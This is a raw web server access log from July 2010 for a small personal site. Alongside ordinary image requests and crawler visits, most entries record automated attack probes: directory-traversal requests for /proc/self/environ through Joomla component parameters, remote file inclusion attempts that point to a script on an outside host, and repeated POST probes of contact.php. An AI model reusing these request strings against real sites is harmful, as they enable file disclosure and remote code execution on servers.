116.50.209.67 - - [04/Jul/2010:19:48:04 -0500] "GET /costume/001_JPG%20copy.jpg HTTP/1.1" 200 46065 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
116.50.209.67 - - [04/Jul/2010:19:48:05 -0500] "GET /costume/002_JPG%20copy.jpg HTTP/1.1" 200 44353 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
116.50.209.67 - - [04/Jul/2010:19:48:06 -0500] "GET /costume/007_JPG%20copy.jpg HTTP/1.1" 200 32768 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
116.50.209.67 - - [04/Jul/2010:19:48:08 -0500] "GET /costume/008_JPG%20copy.jpg HTTP/1.1" 200 32768 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
116.50.209.67 - - [04/Jul/2010:19:48:09 -0500] "GET /costume/003_JPG%20copy.jpg HTTP/1.1" 200 32768 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
116.50.209.67 - - [04/Jul/2010:19:48:10 -0500] "GET /costume/004_JPG%20copy.jpg HTTP/1.1" 200 32768 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
89.152.109.1 - - [04/Jul/2010:19:48:30 -0500] "POST /logs/access_log.1266710400/contact.php HTTP/1.1" 404 322 "-""Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
89.152.109.1 - - [04/Jul/2010:19:48:30 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
89.152.109.1 - - [04/Jul/2010:19:48:30 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
124.254.77.243 - - [04/Jul/2010:19:48:43 -0500] "GET /logs/access_log.1275091200/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
124.254.77.243 - - [04/Jul/2010:19:48:43 -0500] "GET /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
124.254.77.243 - - [04/Jul/2010:19:48:44 -0500] "GET /logs/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
124.254.77.243 - - [04/Jul/2010:19:48:49 -0500] "GET /logs/access_log.1275091200/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
124.254.77.243 - - [04/Jul/2010:19:48:49 -0500] "GET /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
124.254.77.243 - - [04/Jul/2010:19:48:50 -0500] "GET /logs/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
124.254.77.243 - - [04/Jul/2010:19:48:56 -0500] "GET /logs/access_log.1277424000/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
124.254.77.243 - - [04/Jul/2010:19:48:57 -0500] "GET /logs/access_log.1275091200/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
124.254.77.243 - - [04/Jul/2010:19:48:57 -0500] "GET /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
124.254.77.243 - - [04/Jul/2010:19:48:58 -0500] "GET /logs/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
124.254.77.243 - - [04/Jul/2010:19:49:00 -0500] "GET /logs/access_log.1277424000/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
124.254.77.243 - - [04/Jul/2010:19:49:09 -0500] "GET /logs/access_log.1277424000/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
124.254.77.243 - - [04/Jul/2010:19:50:52 -0500] "GET /logs/access_log.1277164800/index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
124.254.77.243 - - [04/Jul/2010:19:50:52 -0500] "GET /index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
124.254.77.243 - - [04/Jul/2010:19:50:53 -0500] "GET /logs/index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
124.254.77.243 - - [04/Jul/2010:19:50:53 -0500] "GET /logs/access_log.1277164800/index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
124.254.77.243 - - [04/Jul/2010:19:50:53 -0500] "GET /index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
124.254.77.243 - - [04/Jul/2010:19:50:54 -0500] "GET /logs/index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
124.254.77.243 - - [04/Jul/2010:19:51:01 -0500] "GET /logs/access_log.1277164800/index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
124.254.77.243 - - [04/Jul/2010:19:51:02 -0500] "GET /index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
124.254.77.243 - - [04/Jul/2010:19:51:02 -0500] "GET /logs/index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
89.189.179.214 - - [04/Jul/2010:19:51:24 -0500] "GET /index2.php?option=com_myblog&task=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 294 "-""MaMa CaSpEr"
89.189.179.214 - - [04/Jul/2010:19:51:24 -0500] "GET /logs/access_log.1277164800%20%20/index2.php?option=com_myblog&task=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 323 "-""MaMa CaSpEr"
89.189.179.214 - - [04/Jul/2010:19:51:24 -0500] "GET /logs/index2.php?option=com_myblog&task=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 299 "-""MaMa CaSpEr"
124.254.77.243 - - [04/Jul/2010:19:53:15 -0500] "GET /logs/access_log.1276214400/index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
124.254.77.243 - - [04/Jul/2010:19:53:19 -0500] "GET /logs/access_log.1276214400/index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
124.254.77.243 - - [04/Jul/2010:19:53:21 -0500] "GET /logs/access_log.1276214400/index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
207.58.162.113 - - [04/Jul/2010:19:53:58 -0500] "GET /index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
124.254.77.243 - - [04/Jul/2010:19:54:23 -0500] "GET /firstvisit.php?lang_global=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
124.254.77.243 - - [04/Jul/2010:19:54:23 -0500] "GET /firstvisit.php?lang_global=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
124.254.77.243 - - [04/Jul/2010:19:54:25 -0500] "GET /firstvisit.php?lang_global=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
207.58.162.113 - - [04/Jul/2010:19:59:54 -0500] "GET /logs/access_log.1275782400/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
207.58.162.113 - - [04/Jul/2010:19:59:55 -0500] "GET /index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
207.58.162.113 - - [04/Jul/2010:19:59:55 -0500] "GET /logs/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
207.58.162.113 - - [04/Jul/2010:20:01:05 -0500] "GET /logs/access_log.1275609600/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
92.60.176.46 - - [04/Jul/2010:20:02:26 -0500] "GET /lfi%20/index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 298 "-""MaMa CaSpEr"
92.60.176.46 - - [04/Jul/2010:20:02:26 -0500] "GET /logs/lfi%20/index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 303 "-""MaMa CaSpEr"
92.60.176.46 - - [04/Jul/2010:20:02:26 -0500] "GET /logs/access_log.1276819200/lfi%20/index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 325 "-""MaMa CaSpEr"
67.195.112.180 - - [04/Jul/2010:20:03:53 -0500] "GET /tattoo/tatsymbl.htm HTTP/1.0" 200 3085 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
84.200.240.34 - - [04/Jul/2010:20:05:45 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
84.200.240.34 - - [04/Jul/2010:20:05:45 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
84.200.240.34 - - [04/Jul/2010:20:05:45 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
84.200.240.34 - - [04/Jul/2010:20:05:45 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
84.200.240.34 - - [04/Jul/2010:20:05:45 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
84.200.240.34 - - [04/Jul/2010:20:05:45 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
84.200.240.34 - - [04/Jul/2010:20:05:45 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
84.200.240.34 - - [04/Jul/2010:20:05:45 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
84.200.240.34 - - [04/Jul/2010:20:05:45 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
84.200.240.34 - - [04/Jul/2010:20:05:46 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
84.200.240.34 - - [04/Jul/2010:20:05:46 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
84.200.240.34 - - [04/Jul/2010:20:05:46 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
84.200.240.34 - - [04/Jul/2010:20:05:46 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
84.200.240.34 - - [04/Jul/2010:20:05:46 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
84.200.240.34 - - [04/Jul/2010:20:05:46 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
84.200.240.34 - - [04/Jul/2010:20:05:46 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
84.200.240.34 - - [04/Jul/2010:20:05:46 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
84.200.240.34 - - [04/Jul/2010:20:05:46 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
124.254.77.243 - - [04/Jul/2010:20:08:50 -0500] "GET /logs/access_log.1275782400/firstvisit.php?lang_global=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 325 "-""libwww-perl/5.805"
124.254.77.243 - - [04/Jul/2010:20:08:50 -0500] "GET /logs/access_log.1275782400/firstvisit.php?lang_global=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 325 "-""libwww-perl/5.805"
124.254.77.243 - - [04/Jul/2010:20:08:51 -0500] "GET /firstvisit.php?lang_global=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
124.254.77.243 - - [04/Jul/2010:20:08:51 -0500] "GET /firstvisit.php?lang_global=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
124.254.77.243 - - [04/Jul/2010:20:08:51 -0500] "GET /logs/firstvisit.php?lang_global=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-""libwww-perl/5.805"
124.254.77.243 - - [04/Jul/2010:20:08:51 -0500] "GET /logs/firstvisit.php?lang_global=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-""libwww-perl/5.805"
124.254.77.243 - - [04/Jul/2010:20:09:01 -0500] "GET /logs/access_log.1275782400/firstvisit.php?lang_global=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 325 "-""libwww-perl/5.805"
124.254.77.243 - - [04/Jul/2010:20:09:01 -0500] "GET /firstvisit.php?lang_global=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
124.254.77.243 - - [04/Jul/2010:20:09:02 -0500] "GET /logs/firstvisit.php?lang_global=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-""libwww-perl/5.805"
173.212.206.186 - - [04/Jul/2010:20:09:09 -0500] "GET /logs/access_log.1215820800 HTTP/1.1" 404 310 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.152.109.1 - - [04/Jul/2010:20:11:14 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
89.152.109.1 - - [04/Jul/2010:20:11:14 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
89.152.109.1 - - [04/Jul/2010:20:11:15 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
124.254.77.243 - - [04/Jul/2010:20:12:18 -0500] "GET /logs/access_log.1276128000/firstvisit.php?lang_global=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 325 "-""libwww-perl/5.805"
124.254.77.243 - - [04/Jul/2010:20:12:19 -0500] "GET /logs/access_log.1276128000/firstvisit.php?lang_global=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 325 "-""libwww-perl/5.805"
124.254.77.243 - - [04/Jul/2010:20:12:31 -0500] "GET /logs/access_log.1276128000/firstvisit.php?lang_global=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 325 "-""libwww-perl/5.805"
92.60.176.46 - - [04/Jul/2010:20:14:53 -0500] "GET /lfi%20/index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 298 "-""MaMa CaSpEr"
92.60.176.46 - - [04/Jul/2010:20:14:53 -0500] "GET /logs/access_log.1277164800%20%20/lfi%20/index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 327 "-""MaMa CaSpEr"
92.60.176.46 - - [04/Jul/2010:20:14:53 -0500] "GET /logs/lfi%20/index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 303 "-""MaMa CaSpEr"
207.46.199.200 - - [04/Jul/2010:20:16:01 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
114.108.151.149 - - [04/Jul/2010:20:17:08 -0500] "GET /logs//index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
114.108.151.149 - - [04/Jul/2010:20:17:08 -0500] "GET //index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
99.198.107.250 - - [04/Jul/2010:20:19:10 -0500] "GET //index.php?option=com_swmenufree&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
99.198.107.250 - - [04/Jul/2010:20:22:01 -0500] "GET /logs/access_log.1276041600//index.php?option=com_swmenufree&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
99.198.107.250 - - [04/Jul/2010:20:22:01 -0500] "GET //index.php?option=com_swmenufree&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
99.198.107.250 - - [04/Jul/2010:20:22:01 -0500] "GET /logs//index.php?option=com_swmenufree&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
216.14.125.163 - - [04/Jul/2010:20:22:13 -0500] "POST ///contact.php HTTP/1.1" 404 297 "-""sledink Bot Search"
216.14.125.163 - - [04/Jul/2010:20:22:13 -0500] "POST /logs/access_log.1266710400%20%20///contact.php HTTP/1.1" 404 326 "-""sledink Bot Search"
216.14.125.163 - - [04/Jul/2010:20:22:13 -0500] "POST ///contact.php HTTP/1.1" 404 297 "-""sledink Bot Search"
216.14.125.163 - - [04/Jul/2010:20:22:13 -0500] "POST /logs/access_log.1266710400%20%20///contact.php HTTP/1.1" 404 326 "-""sledink Bot Search"
216.14.125.163 - - [04/Jul/2010:20:22:13 -0500] "POST ///contact.php HTTP/1.1" 404 297 "-""sledink Bot Search"
216.14.125.163 - - [04/Jul/2010:20:22:13 -0500] "POST /logs/access_log.1266710400%20%20///contact.php HTTP/1.1" 404 326 "-""sledink Bot Search"
216.14.125.163 - - [04/Jul/2010:20:22:13 -0500] "POST /logs///contact.php HTTP/1.1" 404 302 "-""sledink Bot Search"
216.14.125.163 - - [04/Jul/2010:20:22:13 -0500] "POST ///contact.php HTTP/1.1" 404 297 "-""sledink Bot Search"
216.14.125.163 - - [04/Jul/2010:20:22:13 -0500] "POST /logs/access_log.1266710400%20%20///contact.php HTTP/1.1" 404 326 "-""sledink Bot Search"
216.14.125.163 - - [04/Jul/2010:20:22:13 -0500] "POST /logs///contact.php HTTP/1.1" 404 302 "-""sledink Bot Search"
216.14.125.163 - - [04/Jul/2010:20:22:13 -0500] "POST /logs///contact.php HTTP/1.1" 404 302 "-""sledink Bot Search"
216.14.125.163 - - [04/Jul/2010:20:22:13 -0500] "POST /logs///contact.php HTTP/1.1" 404 302 "-""sledink Bot Search"
99.198.107.250 - - [04/Jul/2010:20:22:47 -0500] "GET /logs/access_log.1276646400//index.php?option=com_swmenufree&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
89.138.232.95 - - [04/Jul/2010:20:22:55 -0500] "GET /logs/access_log.1219881600 HTTP/1.0" 404 298 "http://tomdolan.pconline.com/logs/access_log.1219881600""Mozilla/4.0 (compatible; MSIE 5.0; Windows 95) Opera 6.01 [en]"
89.138.232.95 - - [04/Jul/2010:20:22:55 -0500] "GET / HTTP/1.0" 200 991 "http://tomdolan.pconline.com/""Mozilla/4.0 (compatible; MSIE 5.0; Windows 95) Opera 6.01 [en]"
89.189.179.214 - - [04/Jul/2010:20:23:43 -0500] "GET /index2.php?option=com_myblog&task=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 294 "-""MaMa CaSpEr"
89.189.179.214 - - [04/Jul/2010:20:23:43 -0500] "GET /logs/index2.php?option=com_myblog&task=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 299 "-""MaMa CaSpEr"
89.189.179.214 - - [04/Jul/2010:20:23:43 -0500] "GET /logs/access_log.1275264000%20%20/index2.php?option=com_myblog&task=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 323 "-""MaMa CaSpEr"
89.189.179.214 - - [04/Jul/2010:20:23:43 -0500] "GET /logs/access_log.1275782400%20%20/index2.php?option=com_myblog&task=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 323 "-""MaMa CaSpEr"
189.166.47.84 - - [04/Jul/2010:20:24:29 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 200 67733 "http://andria-achira.bl0gger.eu/100505/p2/""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4"
92.60.176.46 - - [04/Jul/2010:20:26:49 -0500] "GET /logs/access_log.1276819200%20%20/lfi%20/index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 327 "-""MaMa CaSpEr"
67.195.112.180 - - [04/Jul/2010:20:27:14 -0500] "GET /?N=D HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
91.121.26.63 - - [04/Jul/2010:20:29:09 -0500] "GET //index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
207.46.13.41 - - [04/Jul/2010:20:31:33 -0500] "GET /logs/access_log.1159747200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.58.140.245 - - [04/Jul/2010:20:35:14 -0500] "GET //index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
91.121.92.195 - - [04/Jul/2010:20:38:54 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
91.121.92.195 - - [04/Jul/2010:20:39:10 -0500] "GET /logs/access_log.1275609600//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
91.121.92.195 - - [04/Jul/2010:20:39:10 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
91.121.92.195 - - [04/Jul/2010:20:39:11 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
91.121.92.195 - - [04/Jul/2010:20:39:11 -0500] "GET /logs/access_log.1274572800//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
201.116.197.150 - - [04/Jul/2010:20:39:36 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
84.18.196.69 - - [04/Jul/2010:20:39:54 -0500] "GET //index.php?option=com_jequoteform&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
92.60.176.46 - - [04/Jul/2010:20:40:19 -0500] "GET /logs/access_log.1276819200//?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 312 "-""MaMa CaSpEr"
92.60.176.46 - - [04/Jul/2010:20:40:19 -0500] "GET //?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""MaMa CaSpEr"
92.60.176.46 - - [04/Jul/2010:20:40:21 -0500] "GET /logs//?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 12140 "-""MaMa CaSpEr"
201.116.197.150 - - [04/Jul/2010:20:40:53 -0500] "GET /logs/access_log.1275609600//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.65"
201.116.197.150 - - [04/Jul/2010:20:40:54 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
201.116.197.150 - - [04/Jul/2010:20:40:54 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.65"
201.116.197.150 - - [04/Jul/2010:20:40:58 -0500] "GET /logs/access_log.1274572800//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.65"
91.121.26.63 - - [04/Jul/2010:20:41:55 -0500] "GET /logs/access_log.1276041600//index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.813"
